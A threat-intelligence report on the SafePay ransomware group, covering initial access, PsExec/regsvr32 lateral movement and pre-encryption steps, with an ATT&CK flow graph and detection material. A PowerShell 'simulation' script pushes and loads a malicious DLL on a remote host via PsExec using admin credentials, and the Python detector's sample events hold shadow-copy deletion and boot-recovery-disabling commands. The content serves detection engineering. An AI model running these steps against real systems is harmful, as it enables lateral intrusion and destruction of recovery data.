SOC Prime Bias: High

14 Jan 2026 19:49

Inside SafePay: Analyzing the New Centralized Ransomware Group

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

SafePay is a recently surfaced ransomware operation that appears to run as a tightly controlled, centralized group rather than a typical Ransomware-as-a-Service ecosystem. The actors follow a double-extortion playbook, staging sensitive data ahead of encryption and threatening publication via a Tor-based leak site. Delivery commonly involves a native Windows DLL, with execution and propagation supported by widely available living-off-the-land utilities. In observed cases, the end-to-end timeline is aggressive, frequently compressing initial access through environment-wide encryption into roughly a 24-hour window.

Investigation

Researchers report that SafePay often secures entry through exposed VPN or RDP accounts using stolen or guessed credentials, and in some scenarios abuses misconfigured FortiGate deployments—particularly environments lacking MFA. For persistence, operators have been observed deploying backdoors such as QDoor and leveraging legitimate remote administration tooling, including ScreenConnect, to blend into normal IT activity. Lateral movement is typically driven through PsExec and WinRM, while host and share discovery is supported by a bespoke PowerShell utility (ShareFinder.ps1). Prior to encryption, the payload performs “pre-ransom” actions designed to maximize impact and hinder recovery: it removes shadow copies, alters boot configuration settings, and terminates a hard-coded set of security-related processes and services.

Mitigation

Require MFA across all remote access pathways and reduce firewall risk by restricting local account authentication and tightening administrative exposure. Monitor for anomalous use of PsExec, WinRM, regsvr32, and rundll32—especially in sequences consistent with remote execution and staging. Tune endpoint detections to surface termination of common security tooling, deletion of shadow copies, and changes to BCD/boot settings. Reduce execution opportunities by blocking or tightly controlling unsigned DLL loading and enforcing application control policies across endpoints and servers.

Response

When SafePay indicators are identified, isolate affected systems immediately, capture volatile memory, and preserve relevant authentication, endpoint, and network logs. Identify and block associated command-and-control infrastructure, then terminate malicious processes and remove persistence mechanisms. Attempt recovery actions such as restoring shadow copies where feasible, but assume data theft may have occurred and validate exfiltration scope. Complete a full forensic review to determine impacted data and execute stakeholder notifications and escalation steps aligned to double-extortion response procedures.

Attack Flow

    graph TB
      %% Class definitions
      classDef technique fill:#99ccff
      classDef tool fill:#ffcc99
      classDef operator fill:#ff9900

      %% Initial Access
      tech_valid_accounts["<b>Technique</b> – T1078 Valid Accounts<br/>Adversaries use stolen or brute-forced credentials to log into VPN or RDP"]
      class tech_valid_accounts technique
      tech_brute_force["<b>Technique</b> – T1110 Brute Force<br/>Password guessing to obtain valid credentials"]
      class tech_brute_force technique
      tool_vpn["<b>Tool</b> – VPN gateway"]
      class tool_vpn tool
      tool_rdp["<b>Tool</b> – RDP service"]
      class tool_rdp tool
      op_and_access(("AND"))
      class op_and_access operator

      %% Execution
      tech_regsvr32["<b>Technique</b> – T1218.010 Regsvr32<br/>Loads malicious DLL via registration"]
      class tech_regsvr32 technique
      tech_rundll32["<b>Technique</b> – T1218.011 Rundll32<br/>Executes code from a DLL"]
      class tech_rundll32 technique
      tech_powershell["<b>Technique</b> – T1059.001 PowerShell<br/>Runs PowerShell commands post-deployment"]
      class tech_powershell technique
      tech_cmd["<b>Technique</b> – T1059.003 Command Shell<br/>Runs Windows command line instructions"]
      class tech_cmd technique
      op_and_execution(("AND"))
      class op_and_execution operator

      %% Persistence
      tech_boot_autostart["<b>Technique</b> – T1547.010 Boot or Logon Autostart Execution<br/>DLL registered with Regsvr32 for persistence"]
      class tech_boot_autostart technique
      tech_appinit["<b>Technique</b> – T1546.010 AppInit DLLs<br/>Loads malicious DLL at system start"]
      class tech_appinit technique
      op_and_persistence(("AND"))
      class op_and_persistence operator

      %% Discovery
      tech_share_discovery["<b>Technique</b> – T1135 Network Share Discovery<br/>ShareFinder.ps1 enumerates SMB shares"]
      class tech_share_discovery technique

      %% Lateral Movement
      tech_psexec["<b>Technique</b> – T1021.002 PsExec<br/>Executes commands over SMB admin shares"]
      class tech_psexec technique
      tech_rdp_lm["<b>Technique</b> – T1021.001 Remote Services RDP<br/>Uses RDP for lateral movement"]
      class tech_rdp_lm technique
      tech_deploy_tools["<b>Technique</b> – T1072 Software Deployment Tools<br/>Leverages deployment utilities to run commands on remote hosts"]
      class tech_deploy_tools technique
      op_and_lateral(("AND"))
      class op_and_lateral operator

      %% Defense Evasion
      tech_service_stop["<b>Technique</b> – T1489 Service Stop<br/>Terminates antivirus or backup services"]
      class tech_service_stop technique
      tech_inhibit_recovery["<b>Technique</b> – T1490 Inhibit System Recovery<br/>Deletes VSS snapshots and edits boot config"]
      class tech_inhibit_recovery technique
      tech_cmstp["<b>Technique</b> – T1548.002 Bypass UAC via CMSTP<br/>Uses CMSTP to run code with elevated rights"]
      class tech_cmstp technique
      op_and_evasion(("AND"))
      class op_and_evasion operator

      %% Collection & Exfiltration
      tech_winrar["<b>Technique</b> – T1560.001 Archive via WinRAR<br/>Creates encrypted .rar archives of collected data"]
      class tech_winrar technique
      tech_lateral_transfer["<b>Technique</b> – T1570 Lateral Tool Transfer<br/>Moves archive files between compromised hosts"]
      class tech_lateral_transfer technique
      tech_ingress_transfer["<b>Technique</b> – T1105 Ingress Tool Transfer<br/>Uploads archives to external server"]
      class tech_ingress_transfer technique
      op_and_collection(("AND"))
      class op_and_collection operator

      %% Impact
      tech_encrypt_impact["<b>Technique</b> – T1486 Data Encrypted for Impact<br/>Encrypts files with AES/ChaCha20 and stores keys with RSA/x25519"]
      class tech_encrypt_impact technique

      %% Command and Control
      tech_encrypted_c2["<b>Technique</b> – T1573.001 Encrypted Channel Symmetric Cryptography<br/>Protects C2 traffic with encryption"]
      class tech_encrypted_c2 technique

      %% Flow connections
      %% Initial Access flow
      tech_brute_force -->|leads to| tech_valid_accounts
      tech_valid_accounts -->|uses| tool_vpn
      tech_valid_accounts -->|uses| tool_rdp
      tech_valid_accounts -->|enables| op_and_access
      op_and_access -->|leads to| tech_regsvr32
      op_and_access -->|leads to| tech_rundll32
      op_and_access -->|leads to| tech_powershell
      op_and_access -->|leads to| tech_cmd
      op_and_access -->|enables| op_and_execution
      op_and_execution -->|enables| tech_boot_autostart
      op_and_execution -->|enables| tech_appinit
      op_and_execution -->|enables| op_and_persistence
      op_and_persistence -->|leads to| tech_share_discovery
      tech_share_discovery -->|enables| op_and_lateral
      op_and_lateral -->|uses| tech_psexec
      op_and_lateral -->|uses| tech_rdp_lm
      op_and_lateral -->|uses| tech_deploy_tools
      op_and_lateral -->|enables| op_and_evasion
      op_and_evasion -->|uses| tech_service_stop
      op_and_evasion -->|uses| tech_inhibit_recovery
      op_and_evasion -->|uses| tech_cmstp
      op_and_evasion -->|enables| op_and_collection
      op_and_collection -->|uses| tech_winrar
      op_and_collection -->|uses| tech_lateral_transfer
      op_and_collection -->|uses| tech_ingress_transfer
      op_and_collection -->|leads to| tech_encrypt_impact
      tech_encrypt_impact -->|supports| tech_encrypted_c2

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An adversary with Domain Administrator credentials compromises a pivot machine and uses PsExec to launch a remote cmd.exe on a secondary host (TARGET_IP). Immediately after establishing the remote shell, the attacker transfers a malicious DLL (malicious.dll) to the remote host and loads it using regsvr32.exe (alternatively rundll32.exe) to execute the ransomware payload. The sequence produces two distinct process‑creation events that satisfy the Sigma rule: a PsExec process with the exact command line and a subsequent DLL loader process.

  • Regression Test Script:

    # -------------------------------------------------------------------------
    # SafePay Ransomware Simulation – PsExec + Regsvr32
    # -------------------------------------------------------------------------
    # Prerequisites:
    #   - PsExec.exe in the current directory or in PATH
    #   - A malicious DLL named malicious.dll placed in the same folder
    #   - Valid domain admin credentials (replace placeholders)
    # -------------------------------------------------------------------------

    $targetIP   = "10.0.0.20"            # <--- CHANGE TO YOUR TARGET
    $username   = "DomainAdmin"          # <--- CHANGE TO VALID USER
    $password   = "Password123!"         # <--- CHANGE TO VALID PASSWORD
    $dllPath    = Join-Path $PSScriptRoot "malicious.dll"

    # 1) Execute remote cmd.exe via PsExec
    #    Arguments are passed individually (a single string would reach PsExec
    #    as one quoted argument); -d returns without waiting for the remote
    #    cmd.exe so the script can continue to the DLL staging step.
    Write-Host "[*] Launching remote cmd.exe via PsExec..."
    & .\PsExec.exe "\\$targetIP" -u $username -p $password -d cmd.exe

    Start-Sleep -Seconds 5  # give remote session time to start

    # 2) Copy the malicious DLL to the remote host (using SMB)
    Write-Host "[*] Copying malicious DLL to remote host..."
    $destPath = "\\$targetIP\C$\Temp\malicious.dll"
    Copy-Item -Path $dllPath -Destination $destPath -Force

    # 3) Load the DLL via regsvr32 (this generates the second event)
    Write-Host "[*] Loading malicious DLL with regsvr32..."
    & regsvr32.exe /s $destPath

    Write-Host "[+] Simulation complete. Check SIEM for alerts."
  • Cleanup Commands:

    # -------------------------------------------------------------------------
    # Cleanup for SafePay Simulation
    # -------------------------------------------------------------------------
    $targetIP  = "10.0.0.20"
    $dllRemote = "\\$targetIP\C$\Temp\malicious.dll"

    # Remove the malicious DLL from the remote host
    Write-Host "[*] Removing malicious DLL from remote host..."
    Remove-Item -Path $dllRemote -Force -ErrorAction SilentlyContinue

    # Optionally terminate any lingering regsvr32/rundll32 processes that were
    # started with the remote DLL path. Get-Process does not expose the command
    # line on Windows PowerShell 5.1, and the executable's own Path never
    # contains the target IP, so query Win32_Process instead.
    Get-CimInstance -ClassName Win32_Process -Filter "Name='regsvr32.exe' OR Name='rundll32.exe'" |
        Where-Object { $_.CommandLine -like "*$targetIP*" } |
        ForEach-Object { Stop-Process -Id $_.ProcessId -Force -ErrorAction SilentlyContinue }

    Write-Host "[+] Cleanup complete."
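The Mitigation section asks defenders to monitor for anomalous PsExec, regsvr32 and rundll32 use, shadow-copy deletion and BCD changes, and the Attack Narrative above describes the two process-creation events (a PsExec launch followed by a DLL loader) that the detection is meant to catch. The following Python script is an added example, not SOC Prime's Sigma rule and not any SafePay code: it applies those checks to constructed process-creation records whose field names (ts, host, image, cmd) loosely mirror Sysmon Event ID 1 / Security 4688, and it escalates a suspicious loader to a high-severity alert when PsExec or its PSEXESVC service started on the same host within a 10-minute window. The hosts, IPs, paths and that window are assumptions chosen for illustration.

```python
"""Detection logic for the PsExec -> regsvr32/rundll32 chain and the
"pre-ransom" shadow-copy / boot-config commands described in the report.

Added example only: this is not SOC Prime's Sigma rule and not SafePay code.
Event field names (ts, host, image, cmd) loosely mirror Sysmon Event ID 1 /
Security 4688 process-creation records; hosts, IPs, paths and the 10-minute
correlation window are constructed assumptions for illustration.
"""
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    {"ts": "2026-01-14T19:40:02", "host": "PIVOT01",
     "image": r"C:\Tools\PsExec.exe",
     "cmd": r"PsExec.exe \\10.0.0.20 -u CORP\admin -p ***** -d cmd.exe"},
    {"ts": "2026-01-14T19:40:09", "host": "PIVOT01",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"regsvr32.exe /s \\10.0.0.20\C$\Temp\malicious.dll"},
    {"ts": "2026-01-14T19:41:00", "host": "FS02",
     "image": r"C:\Windows\PSEXESVC.exe",          # service side on the target
     "cmd": r"C:\Windows\PSEXESVC.exe"},
    {"ts": "2026-01-14T19:41:30", "host": "FS02",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2026-01-14T19:41:31", "host": "FS02",
     "image": r"C:\Windows\System32\bcdedit.exe",
     "cmd": "bcdedit.exe /set {default} recoveryenabled no"},
    {"ts": "2026-01-14T19:45:00", "host": "WS07",   # benign: system DLL, no PsExec
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"regsvr32.exe /s C:\Windows\System32\vbscript.dll"},
    {"ts": "2026-01-14T19:46:00", "host": "WS07",   # loader without a PsExec precursor
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Users\Public\payload.dll,DllMain"},
]

PSEXEC_RE = re.compile(r"(?:^|\\)(psexec(?:64)?|psexesvc)\.exe$", re.I)
LOADER_RE = re.compile(r"(?:^|\\)(regsvr32|rundll32)\.exe$", re.I)
DLL_ARG_RE = re.compile(r'((?:\\\\|[A-Za-z]:\\)[^\s,"]+\.dll)', re.I)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
RECOVERY_PATTERNS = [
    ("vssadmin delete shadows", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("wmic shadowcopy delete", re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("bcdedit recovery disabled",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
]
CHAIN_WINDOW = timedelta(minutes=10)  # assumption: how long after PsExec a loader counts as the chain


def dll_path(cmd):
    """Return the first DLL path argument in a command line, or None."""
    m = DLL_ARG_RE.search(cmd)
    return m.group(1) if m else None


def suspicious_loader(ev):
    """regsvr32/rundll32 loading a DLL from a UNC path or from outside the system directories."""
    if not LOADER_RE.search(ev["image"]):
        return False
    path = dll_path(ev["cmd"])
    if path is None:
        return False
    p = path.lower()
    return p.startswith("\\\\") or not p.startswith(SYSTEM_DIRS)


def make_alert(rule, ev, severity):
    return {"rule": rule, "severity": severity, "host": ev["host"], "ts": ev["ts"], "cmd": ev["cmd"]}


def detect(events):
    """Apply all rules in time order; escalate a loader that follows PsExec on the same host."""
    alerts = []
    last_psexec = {}  # host -> time of the most recent PsExec / PSEXESVC start
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        if PSEXEC_RE.search(ev["image"]):
            last_psexec[ev["host"]] = ts
            alerts.append(make_alert("psexec_remote_exec", ev, "medium"))
        if suspicious_loader(ev):
            prior = last_psexec.get(ev["host"])
            if prior is not None and ts - prior <= CHAIN_WINDOW:
                alerts.append(make_alert("psexec_then_dll_loader_chain", ev, "high"))
            else:
                alerts.append(make_alert("dll_loader_nonstandard_path", ev, "medium"))
        for name, pattern in RECOVERY_PATTERNS:
            if pattern.search(ev["cmd"]):
                alerts.append(make_alert("inhibit_system_recovery:" + name, ev, "high"))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['severity']:6}] {a['host']:8} {a['ts']}  {a['rule']}  <- {a['cmd']}")
```

Run against the constructed events, the script raises six alerts: the two PsExec starts, the high-severity chain on PIVOT01 (regsvr32 loading from the admin share seven seconds after PsExec), the vssadmin and bcdedit pre-ransom commands on FS02, and a medium-severity standalone loader on WS07; the regsvr32 call that registers a DLL from System32 produces nothing. In production the same correlation keys on host plus a time window, but PSEXESVC on the target side is the more reliable precursor because the attacker's pivot machine may not be in your telemetry.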